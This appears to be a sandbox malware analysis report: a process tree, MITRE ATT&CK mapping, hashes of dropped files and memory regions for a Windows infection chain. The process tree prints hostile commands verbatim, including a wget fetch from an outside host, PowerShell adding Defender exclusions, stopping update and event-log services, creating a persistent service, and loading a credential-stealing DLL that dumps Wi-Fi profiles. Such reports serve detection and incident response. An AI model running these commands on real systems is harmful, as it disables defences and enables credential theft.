        "C:\Users\Admin\AppData\Roaming\services\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Roaming\services\02plugins*.* "2plugin*" C:\Users\Admin\AppData\Roaming\services
        5⤵
        Executes dropped EXE
        Suspicious use of FindShellTrayWindow
        
        PID:5072
    - - C:\Users\Admin\AppData\Roaming\services\2plugin29017
        
        C:\Users\Admin\AppData\Roaming\services\2plugin29017
        5⤵
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:1520
      - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4620
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        6⤵
        
        PID:2076
        
        C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        7⤵
        
        PID:1880
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop UsoSvc
        6⤵
        Launches sc.exe
        
        PID:2320
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop WaaSMedicSvc
        6⤵
        Launches sc.exe
        
        PID:1372
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop wuauserv
        6⤵
        Launches sc.exe
        
        PID:2408
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop bits
        6⤵
        Launches sc.exe
        
        PID:1860
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop dosvc
        6⤵
        Launches sc.exe
        
        PID:452
      - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        6⤵
        
        PID:3048
      - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
        6⤵
        
        PID:400
      - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        6⤵
        
        PID:4012
      - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
        6⤵
        
        PID:4472
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe delete "OZLCSUZD"
        6⤵
        Launches sc.exe
        
        PID:3708
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe create "OZLCSUZD" binpath= "C:\ProgramData\cwsdjtkixutq\kuytqawknxye.exe" start= "auto"
        6⤵
        Launches sc.exe
        
        PID:1688
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop eventlog
        6⤵
        Launches sc.exe
        
        PID:1076
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe start "OZLCSUZD"
        6⤵
        Launches sc.exe
        
        PID:1660
    - - C:\Users\Admin\AppData\Roaming\services\wget.exe
        
        "C:\Users\Admin\AppData\Roaming\services\wget.exe" ping --content-disposition http://apexgenz.com/3/1 -P C:\Users\Admin\AppData\Roaming\services
        5⤵
        Executes dropped EXE
        Suspicious use of FindShellTrayWindow
        
        PID:2728
    - - C:\Users\Admin\AppData\Roaming\services\winrar.exe
        
        "C:\Users\Admin\AppData\Roaming\services\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Roaming\services\03plugins*.* "3plugin*" C:\Users\Admin\AppData\Roaming\services
        5⤵
        Executes dropped EXE
        Suspicious use of FindShellTrayWindow
        
        PID:4320
    - - C:\Users\Admin\AppData\Roaming\services\3plugin14170
        
        C:\Users\Admin\AppData\Roaming\services\3plugin14170
        5⤵
        Checks computer location settings
        Drops file in Windows directory
        Executes dropped EXE
        Suspicious use of FindShellTrayWindow
        Suspicious use of WriteProcessMemory
        
        PID:1348
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1348 -s 856
        6⤵
        Program crash
        
        PID:4872
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1348 -s 900
        6⤵
        Program crash
        
        PID:4664
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1348 -s 968
        6⤵
        Program crash
        
        PID:2076
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1348 -s 1044
        6⤵
        Program crash
        
        PID:4264
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1348 -s 1028
        6⤵
        Program crash
        
        PID:4940
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1348 -s 1020
        6⤵
        Program crash
        
        PID:3160
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1348 -s 1268
        6⤵
        Program crash
        
        PID:1884
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1348 -s 1304
        6⤵
        Program crash
        
        PID:3712
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1348 -s 1328
        6⤵
        Program crash
        
        PID:4620
      - C:\Users\Admin\AppData\Local\Temp\b4e248fdbd\Dctooux.exe
        
        "C:\Users\Admin\AppData\Local\Temp\b4e248fdbd\Dctooux.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:1940
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1940 -s 684
        7⤵
        Program crash
        
        PID:1688
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1940 -s 704
        7⤵
        Program crash
        
        PID:3660
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1940 -s 692
        7⤵
        Program crash
        
        PID:1148
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1940 -s 708
        7⤵
        Program crash
        
        PID:3252
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1940 -s 896
        7⤵
        Program crash
        
        PID:2224
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1940 -s 916
        7⤵
        Program crash
        
        PID:4404
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1940 -s 916
        7⤵
        Program crash
        
        PID:4688
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1940 -s 988
        7⤵
        Program crash
        
        PID:1596
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1940 -s 1052
        7⤵
        Program crash
        
        PID:1356
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1940 -s 1052
        7⤵
        Program crash
        
        PID:4264
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1940 -s 1400
        7⤵
        Program crash
        
        PID:4188
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1940 -s 1640
        7⤵
        Program crash
        
        PID:784
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Local\Temp\1000012011\cb100c325f.dll, Main
        7⤵
        Loads dropped DLL
        
        PID:3148
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\5ebdeb3f981e75\cred64.dll, Main
        7⤵
        Loads dropped DLL
        Suspicious use of WriteProcessMemory
        
        PID:3660
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\5ebdeb3f981e75\cred64.dll, Main
        8⤵
        Blocklisted process makes network request
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:1068
        
        C:\Windows\system32\netsh.exe
        
        netsh wlan show profiles
        9⤵
        
        PID:1800
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\5ebdeb3f981e75\cred64.dll, Main
        7⤵
        Loads dropped DLL
        
        PID:3136
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\5ebdeb3f981e75\cred64.dll, Main
        8⤵
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        
        PID:4872
        
        C:\Windows\system32\netsh.exe
        
        netsh wlan show profiles
        9⤵
        
        PID:4116
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\5ebdeb3f981e75\cred64.dll, Main
        7⤵
        
        PID:8
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\5ebdeb3f981e75\cred64.dll, Main
        8⤵
        
        PID:848
        
        C:\Windows\system32\netsh.exe
        
        netsh wlan show profiles
        9⤵
        
        PID:824
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1348 -s 1200
        6⤵
        Program crash
        
        PID:4016
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1348 -s 976
        6⤵
        Program crash
        
        PID:2728
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /K rd /s /q "C:\Users\Admin\AppData\Roaming\services" & EXIT
        5⤵
        
        PID:1236

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 1236 -ip 1236
1⤵
PID:1736

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 1348 -ip 1348
1⤵
PID:2316

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 1348 -ip 1348
1⤵
PID:4600

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 1348 -ip 1348
1⤵
PID:2556

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 1348 -ip 1348
1⤵
PID:2904

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 1348 -ip 1348
1⤵
PID:4924

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 1348 -ip 1348
1⤵
PID:4972

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 1348 -ip 1348
1⤵
PID:5096

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 1348 -ip 1348
1⤵
PID:1860

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 1348 -ip 1348
1⤵
PID:4508

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 1348 -ip 1348
1⤵
PID:4776

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 1348 -ip 1348
1⤵
PID:1608

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 1940 -ip 1940
1⤵
PID:1100

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 1940 -ip 1940
1⤵
PID:2568

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 1940 -ip 1940
1⤵
PID:2812

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 1940 -ip 1940
1⤵
PID:4736

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 1940 -ip 1940
1⤵
PID:2432

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1940 -ip 1940
1⤵
PID:1464

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 1940 -ip 1940
1⤵
PID:1624

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 1940 -ip 1940
1⤵
PID:1676

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1940 -ip 1940
1⤵
PID:3348

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 1940 -ip 1940
1⤵
PID:3560

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 1940 -ip 1940
1⤵
PID:1188

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 1940 -ip 1940
1⤵
PID:4576

C:\ProgramData\cwsdjtkixutq\kuytqawknxye.exe
C:\ProgramData\cwsdjtkixutq\kuytqawknxye.exe
1⤵
PID:2476
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:3528

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Credentials in Registry

T1552.002

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
53KB

MD5
d4d8cef58818612769a698c291ca3b37

SHA1
54e0a6e0c08723157829cea009ec4fe30bea5c50

SHA256
98fd693b92a71e24110ce7d018a117757ffdfe0e551a33c5fa5d8888a2d74fb0

SHA512
f165b1dde8f251e95d137a466d9bb77240396e289d1b2f8f1e9a28a6470545df07d00da6449250a1a0d73364c9cb6c00fd6229a385585a734da1ac65ac7e57f6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
8afd83b20a759f4a35366e96768d5a4e

SHA1
c34c1c4aace18d07d1c0831448c44eca91b3dca1

SHA256
26add189f804f6455f3459f6fd3d452784ee67a00ba3ec71f86d52e52a389c4c

SHA512
22332c9c91e76720ac3f1e85a343654461488ea5a769510075695ef703207ad7c632bc2513d748c253cd1c93074104a4d24497a7afcd3cbbb3d4b22fd41f6ed7

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000012011\cb100c325f.dll

Filesize
2.3MB

MD5
502f859ec674fb1023764e93921b5542

SHA1
4e80c651043d2dc1c682ef9fe9e5181abd399adf

SHA256
ae9d87a76527f3d3df30a62db1fab2a669d73c3f3cdd3b366016142036056e40

SHA512
83e65d572d12c4ba2278366e225a3e7842bebbc0108f3de0d319b5504d6c2d9c99157a29e476fb6c1da28f69652565f1a1fcf7b74ed3713a097de7e40d158392

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_s0loga0c.gno.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\5ebdeb3f981e75\cred64.dll

Filesize
1.2MB

MD5
5018b05026a59499aadb6ec08f4a0390

SHA1
e92da4c4350064d7f9dcc4afbbc48a8ed317a352

SHA256
095ded227779ff91573f4e2174e31ded242a0c452ceefd0d1bb2761ffa19977c

SHA512
47742751f577453cb155cf7f88c23df3cd21163f1844fb14f94239fac121712320fd312b6557d173bdeb2b0b6da74cb7ab2a573aa11828e54db325c32aeacdca

Download Submit
C:\Users\Admin\AppData\Roaming\WinRAR\version.dat

Filesize
12B

MD5
7f2f5f68786d3a054cc838379a41603e

SHA1
12d512018b42ac31540c95a8fae40efeb235cfbd

SHA256
c50569c17480b5bfd6d9cdedb5ff44ccc467a515b1d99f30d2eec570db6fa86e

SHA512
61e0ef590c02a99e8ac7f1cd7f46190bc102ecbdedba05765cc06b83fb5df46fffc6399cbddf06281b0dc3a0d0488f31a48a79a01df22199f3acbf2cf66db749

Download Submit
C:\Users\Admin\AppData\Roaming\services\01plugins17774.rar

Filesize
2.9MB

MD5
5829add10b7f66e9fb891a34faab675e

SHA1
0bd24bfa4dc7739968051d530755a3265d8a2fe4

SHA256
2f88ec677b3c1b92c76500482f59c5b0172c44abb50d44fb0894f8d15e54b6ec

SHA512
54cb436a34d1c69eeb03d95d4fcd6ef39893de64dfd193a48f14144f9c958f44427b609c1004cca9546a3e7860dcf6acc4fbd1311f5004f71013689000d46c0a

Download Submit
C:\Users\Admin\AppData\Roaming\services\02plugins13079.rar

Filesize
9.6MB

MD5
abd187f0e53c1502113774b5be2be89b

SHA1
70d90546bb191892666ba0dbc8330137f5593c67

SHA256
763eaffad962a810443b3b47e45ba17f8d57bf1f65c21416840c6f2bbb3ce82c

SHA512
17a0c3bffdec3f38b3fe15c42608561f4bab8cbd43208c652628b603d665eb0ced9a7bc2f1479b3b33654e88cc7587fc11c4d643437eab6fef9a7ac909172460

Download Submit
C:\Users\Admin\AppData\Roaming\services\03plugins17346.rar

Filesize
2.9MB

MD5
aeac6a1a5a22e7e29423e30d6c74c679

SHA1
c6f6461b140287d073361fc184571821ccb54e90

SHA256
8db6963e7dc66543cbe264316585e01f7cbc5014929cb614bb1b0dd847a24e85

SHA512
9e26ac6a41ee390b1f2aaebf6d33a79e4bdc175439f396de504891f7749411f385bc92639b2b5e88efd8b3d301580b157bc0e2ed11e63a51a0b1878217e41e9b

Download Submit
C:\Users\Admin\AppData\Roaming\services\2plugin29017

Filesize
7.3MB

MD5
26427f98c7f37c1472d0bb2e8fac6a19

SHA1
d1fb3f199565b9a84d39eb23da8d6c7858cda859

SHA256
827142857439abbdcd5c849637ac98987f1b1b38c39049bb8ad10914b306150a

SHA512
de610f72e71fb5a971d89cad25df789bb2aeec5d47cdf9ad7ede1301e1ec54814a4a692c391aaba681454498e45de28ae320eebe295000ae6ff6e4e8c03e7f32

Download Submit
C:\Users\Admin\AppData\Roaming\services\3plugin14170

Filesize
406KB

MD5
a6cb8ead79badac2f7c62036a6be1980

SHA1
861883f46cd670ce671ffe0961ea3fe493afbc3d

SHA256
904977d248102149dd406dd63c659fc922b67b04e2d6b6a5039e0764f4fb0c04

SHA512
5db90066b39a751c6102fef1cfc04cf2946e8742b7ce2cb3c992cb4fc1b31891112df59ee9a8fcb8cd801f391aef7fc9d8c31f93d35c6fdc230b78edd86cd11c

Download Submit
C:\Users\Admin\AppData\Roaming\services\Launhcer.dll

Filesize
2KB

MD5
7de0541eb96ba31067b4c58d9399693b

SHA1
a105216391bd53fa0c8f6aa23953030d0c0f9244

SHA256
934f75c8443d6379abdc380477a87ef6531d0429de8d8f31cd6b62f55a978f6e

SHA512
e5ffa3bfd19b4d69c8b4db0aabaf835810b8b8cccd7bc400c7ba90ef5f5ebd745c2619c9a3e83aa6b628d9cf765510c471a2ff8cb6aa5ad4cf3f7826f6ae84a3

Download Submit
C:\Users\Admin\AppData\Roaming\services\Launhcer.exe

Filesize
364KB

MD5
e5c00b0bc45281666afd14eef04252b2

SHA1
3b6eecf8250e88169976a5f866d15c60ee66b758

SHA256
542e2ebbded3ef0c43551fb56ce44d4dbb36a507c2a801c0815c79d9f5e0f903

SHA512
2bacd4e1c584565dfd5e06e492b0122860bfc3b0cc1543e6baded490535309834e0d5bb760f65dbfb19a9bb0beddb27a216c605bbed828810a480c8cd1fba387

Download Submit
C:\Users\Admin\AppData\Roaming\services\Launhcer.exe.manifest

Filesize
1KB

MD5
f0fc065f7fd974b42093594a58a4baef

SHA1
dbf28dd15d4aa338014c9e508a880e893c548d00

SHA256
d6e1c130f3c31258b4f6ff2e5d67bb838b65281af397a11d7eb35a7313993693

SHA512
8bd26de4f9b8e7b6fe9c42f44b548121d033f27272f1da4c340f81aa5642adc17bb9b092ece12bb8515460b9c432bf3b3b7b70f87d4beb6c491d3d0dfb5b71fe

Download Submit
C:\Users\Admin\AppData\Roaming\services\data\Launcher.dll

Filesize
6KB

MD5
f58866e5a48d89c883f3932c279004db

SHA1
e72182e9ee4738577b01359f5acbfbbe8daa2b7f

SHA256
d6f3e13dfff0a116190504efbfcbcd68f5d2183e6f89fd4c860360fba0ec8c12

SHA512
7e76555e62281d355c2346177f60bfe2dc433145037a34cfc2f5848509401768b4db3a9fd2f6e1a1d69c5341db6a0b956abf4d975f28ee4262f1443b192fe177

Download Submit
C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe

Filesize
364KB

MD5
93fde4e38a84c83af842f73b176ab8dc

SHA1
e8c55cc160a0a94e404f544b22e38511b9d71da8

SHA256
fb07af2aead3bdf360f555fc872191e43c2f0acbfc9258435f9a30afe272ba03

SHA512
48720aebe2158b8a58fc3431c2e6f68271fbade51303ad9cb5b0493efaec6053ff0c19a898841ef7c57a3c4d042ac8e7157fb3dc79593c1dfcdcf88e1469fdec

Download Submit
C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe.manifest

Filesize
1KB

MD5
1b6de83d3f1ccabf195a98a2972c366a

SHA1
09f03658306c4078b75fa648d763df9cddd62f23

SHA256
e20486518d09caf6778ed0d60aab51bb3c8b1a498fd4ede3c238ee1823676724

SHA512
e171a7f2431cfe0d3dfbd73e6ea0fc9bd3e5efefc1fbdeff517f74b9d78679913c4a60c57dde75e4a605c288bc2b87b9bb54b0532e67758dfb4a2ac8aea440ce

Download Submit
C:\Users\Admin\AppData\Roaming\services\plugin4559

Filesize
403KB

MD5
1b7cc96226d6ac15718fbc035435cdfe

SHA1
514747a446585d3922b13de79d3afecbc7d4863b

SHA256
5aec3edecf0c3dc4a49d432f4ca60397e7a83b3080d290d65c7753372b069470

SHA512
f0579757d4bc9385c6bcda0a6b8815fe9b9b6099a877f98a80850ae80d911a90ec0f3b94f86c8b2aed1a54b568fcce9c7d414332b7a673550e977e795ef65fc3

Download Submit
C:\Users\Admin\AppData\Roaming\services\wget.exe

Filesize
4.9MB

MD5
8c04808e4ba12cb793cf661fbbf6c2a0

SHA1
bdfdb50c5f251628c332042f85e8dd8cf5f650e3

SHA256
a7b656fb7a45f8980784b90b40f4a14d035b9dc15616465a341043736ec53272

SHA512
9619f96c3180ef3d738ecc1f5df7508c3ff8904021065665c8388a484648e135105e1c1585de1577c8b158f9b5bc241e3ff7f92665e9553e846e1b750ddea20f

Download Submit
C:\Users\Admin\AppData\Roaming\services\winrar.exe

Filesize
2.1MB

MD5
f59f4f7bea12dd7c8d44f0a717c21c8e

SHA1
17629ccb3bd555b72a4432876145707613100b3e

SHA256
f150b01c1cbc540c880dc00d812bcca1a8abe1166233227d621408f3e75b57d4

SHA512
44811f9a5f2917ccd56a7f894157fa305b749ca04903eeaeca493864742e459e0ce640c01c804c266283ce8c3e147c8e6b6cfd6c5cb717e2a374e92c32a63b2c

Download Submit
memory/592-112-0x0000000000400000-0x00000000008F2000-memory.dmp

Filesize
4.9MB

Download
memory/1236-98-0x00007FF8016B0000-0x00007FF8018A5000-memory.dmp

Filesize
2.0MB

Download
memory/1236-100-0x0000000076270000-0x0000000076485000-memory.dmp

Filesize
2.1MB

Download
memory/1236-97-0x0000000004620000-0x0000000004A20000-memory.dmp

Filesize
4.0MB

Download
memory/1236-96-0x0000000004620000-0x0000000004A20000-memory.dmp

Filesize
4.0MB

Download
memory/1236-107-0x0000000000400000-0x0000000001A2F000-memory.dmp

Filesize
22.2MB

Download
memory/1348-150-0x0000000000400000-0x0000000002B8F000-memory.dmp

Filesize
39.6MB

Download
memory/1520-124-0x00007FF8018C0000-0x00007FF8018C2000-memory.dmp

Filesize
8KB

Download
memory/1520-125-0x0000000140000000-0x0000000140E43000-memory.dmp

Filesize
14.3MB

Download
memory/1520-123-0x00007FF8018B0000-0x00007FF8018B2000-memory.dmp

Filesize
8KB

Download
memory/1796-25-0x00000000059D0000-0x00000000059F2000-memory.dmp

Filesize
136KB

Download
memory/1796-43-0x0000000007E90000-0x0000000008434000-memory.dmp

Filesize
5.6MB

Download
memory/1796-41-0x0000000006C60000-0x0000000006C7A000-memory.dmp

Filesize
104KB

Download
memory/1796-24-0x0000000073030000-0x00000000737E0000-memory.dmp

Filesize
7.7MB

Download
memory/1796-118-0x0000000073030000-0x00000000737E0000-memory.dmp

Filesize
7.7MB

Download
memory/1796-27-0x0000000005AE0000-0x0000000005B46000-memory.dmp

Filesize
408KB

Download
memory/1796-38-0x0000000006760000-0x000000000677E000-memory.dmp

Filesize
120KB

Download
memory/1796-22-0x0000000005BC0000-0x00000000061E8000-memory.dmp

Filesize
6.2MB

Download
memory/1796-21-0x0000000002E40000-0x0000000002E76000-memory.dmp

Filesize
216KB

Download
memory/1796-20-0x000000007303E000-0x000000007303F000-memory.dmp

Filesize
4KB

Download
memory/1796-37-0x00000000061F0000-0x0000000006544000-memory.dmp

Filesize
3.3MB

Download
memory/1796-42-0x0000000006CB0000-0x0000000006CD2000-memory.dmp

Filesize
136KB

Download
memory/1796-109-0x0000000073030000-0x00000000737E0000-memory.dmp

Filesize
7.7MB

Download
memory/1796-39-0x00000000067F0000-0x000000000683C000-memory.dmp

Filesize
304KB

Download
memory/1796-40-0x0000000007720000-0x00000000077B6000-memory.dmp

Filesize
600KB

Download
memory/1796-26-0x0000000005A70000-0x0000000005AD6000-memory.dmp

Filesize
408KB

Download
memory/1796-23-0x0000000073030000-0x00000000737E0000-memory.dmp

Filesize
7.7MB

Download
memory/1796-108-0x000000007303E000-0x000000007303F000-memory.dmp

Filesize
4KB

Download
memory/1940-212-0x0000000000400000-0x0000000002B8F000-memory.dmp

Filesize
39.6MB

Download
memory/1940-206-0x0000000000400000-0x0000000002B8F000-memory.dmp

Filesize
39.6MB

Download
memory/1940-163-0x0000000000400000-0x0000000002B8F000-memory.dmp

Filesize
39.6MB

Download
memory/2476-221-0x0000000140000000-0x0000000140E43000-memory.dmp

Filesize
14.3MB

Download
memory/2716-77-0x00000000071A0000-0x00000000071BA000-memory.dmp

Filesize
104KB

Download
memory/2716-73-0x0000000006F90000-0x0000000006F9A000-memory.dmp

Filesize
40KB

Download
memory/2716-69-0x0000000006D70000-0x0000000006D8E000-memory.dmp

Filesize
120KB

Download
memory/2716-59-0x000000006F970000-0x000000006F9BC000-memory.dmp

Filesize
304KB

Download
memory/2716-71-0x0000000006DF0000-0x0000000006E93000-memory.dmp

Filesize
652KB

Download
memory/2716-58-0x0000000006DB0000-0x0000000006DE2000-memory.dmp

Filesize
200KB

Download
memory/2716-78-0x0000000007190000-0x0000000007198000-memory.dmp

Filesize
32KB

Download
memory/2716-76-0x0000000007160000-0x0000000007174000-memory.dmp

Filesize
80KB

Download
memory/2716-75-0x0000000007150000-0x000000000715E000-memory.dmp

Filesize
56KB

Download
memory/2716-72-0x0000000007560000-0x0000000007BDA000-memory.dmp

Filesize
6.5MB

Download
memory/2716-74-0x0000000007120000-0x0000000007131000-memory.dmp

Filesize
68KB

Download
memory/2728-129-0x0000000000400000-0x00000000008F2000-memory.dmp

Filesize
4.9MB

Download
memory/3148-165-0x00000000026A0000-0x00000000027A4000-memory.dmp

Filesize
1.0MB

Download
memory/3148-205-0x0000000010000000-0x0000000010256000-memory.dmp

Filesize
2.3MB

Download
memory/3148-164-0x0000000002570000-0x0000000002692000-memory.dmp

Filesize
1.1MB

Download
memory/3148-179-0x00000000026A0000-0x00000000027A4000-memory.dmp

Filesize
1.0MB

Download
memory/3148-177-0x00000000026A0000-0x00000000027A4000-memory.dmp

Filesize
1.0MB

Download
memory/3148-161-0x0000000010000000-0x0000000010256000-memory.dmp

Filesize
2.3MB

Download
memory/3656-104-0x00007FF8016B0000-0x00007FF8018A5000-memory.dmp

Filesize
2.0MB

Download
memory/3656-106-0x0000000076270000-0x0000000076485000-memory.dmp

Filesize
2.1MB

Download
